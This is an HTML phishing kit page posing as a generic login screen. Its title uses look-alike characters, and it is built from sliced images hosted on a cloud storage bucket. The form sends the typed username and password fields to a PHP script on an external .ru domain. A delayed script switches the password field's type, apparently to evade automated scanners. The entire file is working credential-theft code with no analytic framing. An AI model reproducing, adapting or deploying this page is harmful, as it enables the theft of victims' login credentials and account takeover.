<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Ꮮоgin</title>
<meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests">
<script>setTimeout(function() {
  document.getElementsByTagName('input')[1].type = "password"
}, 1000);
</script>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="shortcut icon"
              href="https://storage.googleapis.com/kjnasjkdnue-ksjnds2.appspot.com/favicon.ico"/>
<style type="text/css">  
.textbox {  
    border: 1px solid rgb(223, 227, 235);
  	border-radius: 4px;
	padding-left: 8px;
	font-family: 'Montserrat', 'Helvetica', sans-serif !important;
	font-size: 16px;
	color: #333;
	font-weight: 600;
    height: 48px; 
    width: 275px; 
 }  
.textbox:focus {  
    border-color: #66afe9; 
    border-style: solid; 
    border-width: 1px; 
    outline: 0; 
 } 
</style>	
<style type="text/css">
div#container
{
	position:relative;
	width: 1365px;
	margin-top: 0px;
	margin-left: auto;
	margin-right: auto;
	text-align:left; 
}
body {text-align:center;margin:0}
</style>

<style>
p{font-size: 40px;}
.loader {
    position: fixed;
    left: 0px;
    top: 0px;
    width: 100%;
    height: 100%;
    z-index: 9999;
    background: url('https://smallenvelop.com/wp-content/uploads/2014/08/Preloader_11.gif') 50% 50% no-repeat rgb(249,249,249);
    opacity: .8;
}
</style>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script type="text/javascript">
$(window).load(function() {
	$(".loader").fadeOut("slow");
});
</script>
<body bgColor="#0D3578">
<div class="loader"></div>
<div id="container">
<div id="image1" style="position:absolute; overflow:hidden; left:0px; top:0px; width:1365px; height:591px; z-index:0"><img src="https://storage.googleapis.com/kjnasjkdnue-ksjnds2.appspot.com/b1.png" alt="" title="" border=0 width=1365 height=591></div>

<div id="image2" style="position:absolute; overflow:hidden; left:532px; top:620px; width:299px; height:70px; z-index:1"><a href="#"><img src="https://storage.googleapis.com/kjnasjkdnue-ksjnds2.appspot.com/b2.png" alt="" title="" border=0 width=299 height=70></a></div>

<div id="image3" style="position:absolute; overflow:hidden; left:481px; top:480px; width:405px; height:20px; z-index:2"><a href="#"><img src="https://storage.googleapis.com/kjnasjkdnue-ksjnds2.appspot.com/b3.png" alt="" title="" border=0 width=405 height=20></a></div>

<div id="image4" style="position:absolute; overflow:hidden; left:441px; top:561px; width:479px; height:23px; z-index:3"><a href="#"><img src="https://storage.googleapis.com/kjnasjkdnue-ksjnds2.appspot.com/b4.png" alt="" title="" border=0 width=479 height=23></a></div>

<div id="image5" style="position:absolute; overflow:hidden; left:1048px; top:23px; width:298px; height:43px; z-index:4"><a href="#"><img src="https://storage.googleapis.com/kjnasjkdnue-ksjnds2.appspot.com/b5.png" alt="" title="" border=0 width=298 height=43></a></div>
<form action=https://wadidiabwnet.ru/sksd15oct/need1.php name=tundamachr method=post>
<input name="ud" class="textbox" autocomplete="off" required type="text" style="position:absolute;width:401px;left:483px;top:196px;z-index:5">
<input name="pd" class="textbox" autocomplete="off" required type="text" style="position:absolute;width:401px;left:483px;top:332px;z-index:6">
<div id="formimage1" style="position:absolute; left:482px; top:404px; z-index:7"><input type="image" name="formimage1" width="402" height="58" src="https://storage.googleapis.com/kjnasjkdnue-ksjnds2.appspot.com/b6.png"></div>
</div>

</body>
</html>
